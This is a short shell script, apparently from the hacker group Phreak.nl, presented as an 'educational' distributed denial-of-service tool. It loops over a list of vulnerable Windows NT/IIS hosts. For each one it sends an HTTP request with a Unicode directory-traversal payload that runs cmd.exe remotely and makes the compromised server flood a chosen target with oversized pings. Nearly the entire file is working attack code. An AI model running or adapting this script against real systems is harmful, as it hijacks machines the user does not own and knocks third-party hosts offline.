#!/bin/sh
#
# DDoS tool written by MrFloat
#
# This tool is not written for scriptkiddies ddos'ing around, but it's
# written for educational purposes: To show how easy it is to make
# boxes - which are not yours - do distributed ping attacks. Admins should
# be aware of bugs in their systems and they should keep them up-to-date
#
# This tool can be very dangerous when you exploit NT boxes with a lot of
# bandwidth, so only test it if you REALLY know what you're doing
#
# This tool was tested on my home LAN
#
# Grtz, MrFloat ( mrfloat@dds.nl )
#
# -
# Usage: ./ddos.sh hostname
#
# Place vulnerable hosts in the bcasts file
#
echo .:: Phreak.nl ::. NT DDoS tool - Written by MrFloat

for i in `cat bcasts`;
  do echo Sending flood request to $i;
  lynx -dump http://$i/scripts/georgi.bat/..\%C1\%9C..\%C1\%9C..\%C1\%9Cwinnt/system32/cmd.exe\?/c\+ping+-n+65000+-l+64000+-w+5+$1 &
done
